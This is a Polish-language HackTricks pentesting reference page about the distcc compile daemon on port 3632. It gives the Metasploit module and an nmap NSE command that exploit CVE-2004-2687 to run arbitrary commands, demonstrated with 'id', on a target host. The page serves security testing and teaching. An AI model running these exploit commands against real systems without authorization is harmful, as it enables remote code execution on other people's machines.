tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Podstawowe informacje
Distcc to narzędzie, które poprawia proces kompilacji, wykorzystując nieużywaną moc obliczeniową innych komputerów w sieci. Gdy distcc jest skonfigurowany na maszynie, ta maszyna jest w stanie rozdzielać swoje zadania kompilacji do innego systemu. Ten system odbierający musi działać z demonem distccd i musi mieć zainstalowany kompatybilny kompilator, aby przetworzyć wysłany kod.
Domyślny port: 3632
PORT STATE SERVICE
3632/tcp open distccd
Eksploatacja
Sprawdź, czy jest podatny na CVE-2004-2687, aby wykonać dowolny kod:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Nie sądzę, żeby shodan wykrywał tę usługę.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post stworzony przez Álex B (@r1p)
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.